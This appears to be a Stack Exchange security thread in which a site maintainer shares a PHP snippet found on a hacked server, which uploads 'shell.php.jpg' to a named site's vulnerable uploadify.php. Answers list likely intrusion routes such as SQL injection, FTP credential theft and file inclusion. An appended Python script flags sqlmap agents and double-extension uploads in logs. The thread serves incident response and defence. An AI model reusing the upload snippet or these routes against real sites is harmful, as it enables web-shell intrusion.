5

I was entrusted with an existing website for which I should make some changes to the design, but when I was about to access it, I saw that it had been compromised. When I was searching for the problem, I found an exploit PHP file containing this code:

    $uploadfile="shell.php.jpg";
    $ch = curl_init("http://macwallpaper.net/wp-content/themes/echea/js/uploadify/uploadify.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";

I can figure out what this script is doing, but I have no idea how the attacker managed to upload it on the server. The only form that the website had was a contact form, and it was only the HTML part without the mail function. Furthermore, I've found 4 more PHP files designed as shells, with a lot of code inside, so I'm not going to post it here.

Are there any ways of deploying such packages without an uploading form, actually without a form at all?

EDIT: The website does have a database, but no other control platform like an administration portal or a client zone (there is no direct access toward the database). It does have FTP, but I have no other information regarding SSH/SCP, etc.

Petru Lebada
  • 103
  • 3
Jason
  • 51
  • 1
  • 2
  • Does it use a database? Is there any admin control panel? – A. Darwin Jun 02 '16 at 07:37
  • 1
    The security hole could be somewhere else, not necessarily in the PHP. Maybe a breached FTP password or an SSH login? Or another website hosted on the same server? – Anders Jun 02 '16 at 07:44
  • Yes, there is a database, but there are just a few SELECTs which it uses to retrieve the menu content. – Petru Lebada Jun 02 '16 at 07:44
  • @Anders, yes, the breached FTP/SSH may be a possibility, but how can they find the credentials? – Petru Lebada Jun 02 '16 at 07:46
  • @Petru Lebada: Even a SELECT query can be used to inject data to your sql server through batch queries if your sql server allows it. (for example, SELECT * ; INSERT INTO **) – Azami Jun 02 '16 at 07:51
  • @MadWard, I agree, but is it the case here? The database was untouched. – Petru Lebada Jun 02 '16 at 07:53
  • @PetruLebada You asked how they can find FTP/SSH. There are different ways, including a bruteforce attack. If you are the OP, I suggest you edit your question, specifying the main components/features of the website, e.g. database, password-protected area for users, admin control panel, protocols used (FTP, SCP, SSH,...). – A. Darwin Jun 02 '16 at 07:56
  • @Petru Lebada: If I'm not mistaken, the SELECT INTO OUTFILE syntax could be used to inject arbitrary php code on your server. My main point is "don't rule out sql injections too quickly". – Azami Jun 02 '16 at 08:06
  • @A.Darwin, I did the requested edit. – Petru Lebada Jun 02 '16 at 08:06
  • @MadWard, indeed... I forgot about that, but even so, how can he inject something like this? There is no direct access towards the database. – Petru Lebada Jun 02 '16 at 08:07
  • 1
    If your pages make insecure requests from the database, an attacker wouldn't need direct access to it. Similarly, if your pages write to the server filesystem, it's entirely possible that an attacker could abuse those. Examine your server log files for unusual traffic - perhaps large numbers of FTP login attempts, where an attacker is trying to guess a password, or PUT requests against your pages, or anything with a user agent of sqlmap - there are many possibilities. – Matthew Jun 02 '16 at 08:18
  • Related http://stackoverflow.com/questions/8115159/can-people-write-a-php-file-to-my-chmod-777-folder – Purefan Jun 02 '16 at 08:29

2 Answers

6

There are a lot of ways. Judging by the main features of your website, an attacker could have used:

  • SQL injection: it is not necessary to have direct access to the database. If you want technical details, this question and its answers explain different ways to obtain a shell from a SQL injection;

  • credential theft: the attacker could have stolen or otherwise obtained your FTP credentials. This can happen through bruteforce attacks, but since standard FTP is not encrypted, and the password is transmitted in cleartext, an attacker could also have sniffed the connection (for example, if you were using a public Wi-Fi network), obtained the password and used it to upload these files;

  • file inclusion (LFI/RFI): if the website is not designed in a careful way, an attacker could upload any PHP file even without any form, database, or stolen credential. For more information: https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion and https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion;

  • malware on your computer: it is possible for an attacker to infect the computer you use to access the website with malware, which could in turn be used to upload PHP files to the website as if you did it. You should already know that there are several ways to infect your computer with malware, but I'm going to highlight one: spear phishing;

  • countless other ways. I strongly suggest you take a look at https://www.owasp.org . It contains a lot of information about web application security, including how to perform code reviews, how to test your website for common vulnerabilities and how to eventually defend it from most attacks.

A. Darwin
  • 3,602
  • 2
  • 17
  • 27
2

Search for uploadify on https://www.exploit-db.com and you will notice that the JS script is part of your theme and vulnerable to an arbitrary file upload vulnerability.

You could delete that script and your theme might still work, or better yet use another, more secure theme.

user112287
  • 21
  • 1
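Matthew's comment recommends reading the server logs for sqlmap user agents, PUT requests and password-guessing traffic, and the second answer identifies the theme's uploadify.php as the upload handler that was abused. The following Python script, added here as an example and not part of the original thread or of any project, runs those checks over an Apache combined-format access log; the log lines, the menu.php path and the client addresses are constructed for the example, while the uploadify.php path and the shell.php.jpg name come from the question.

```python
import re

# Apache "combined" access log format; the request line is split into method and path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Last extension looks harmless but an earlier ".php" segment is present (shell.php.jpg);
# with an AddHandler-style mod_php setup Apache can still execute such a file as PHP.
DOUBLE_EXT_RE = re.compile(r'\.php\d?\.[a-z0-9]+$', re.IGNORECASE)

def classify(entry):
    """Return the names of the indicators that one parsed log entry matches."""
    path = entry['path'].split('?', 1)[0]
    reasons = []
    if 'sqlmap' in entry['ua'].lower():
        reasons.append('sqlmap-user-agent')
    if entry['method'] == 'PUT':
        reasons.append('http-put')
    if entry['method'] == 'POST' and path.lower().endswith('/uploadify.php'):
        reasons.append('post-to-uploadify')          # theme upload handler from the thread
    if DOUBLE_EXT_RE.search(path):
        reasons.append('double-extension-request')   # someone fetching the dropped file
    return reasons

def triage(log_text):
    """Return (ip, method, path, reasons) for every parsable line matching an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                 # skip unparsable lines rather than guess
        entry = m.groupdict()
        reasons = classify(entry)
        if reasons:
            findings.append((entry['ip'], entry['method'], entry['path'], reasons))
    return findings

# Constructed sample log (RFC 5737 documentation addresses), not from the original thread.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jun/2016:07:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Jun/2016:07:12:05 +0000] "GET /menu.php?id=1 HTTP/1.1" 200 2210 "-" "sqlmap/1.0-dev"
198.51.100.9 - - [02/Jun/2016:07:13:40 +0000] "POST /wp-content/themes/echea/js/uploadify/uploadify.php HTTP/1.1" 200 45 "-" "curl/7.38.0"
198.51.100.9 - - [02/Jun/2016:07:13:42 +0000] "GET /wp-content/themes/echea/js/uploadify/shell.php.jpg HTTP/1.1" 200 13 "-" "curl/7.38.0"
192.0.2.44 - - [02/Jun/2016:07:15:00 +0000] "PUT /index.php HTTP/1.1" 405 0 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for ip, method, path, reasons in triage(SAMPLE_LOG):
        print(ip, method, path, ', '.join(reasons))
```

A successful POST to the upload handler followed by a GET of a double-extension file from the same address, as in the sample, is the sequence to look for first; FTP login failures live in the FTP daemon's log, not the web access log.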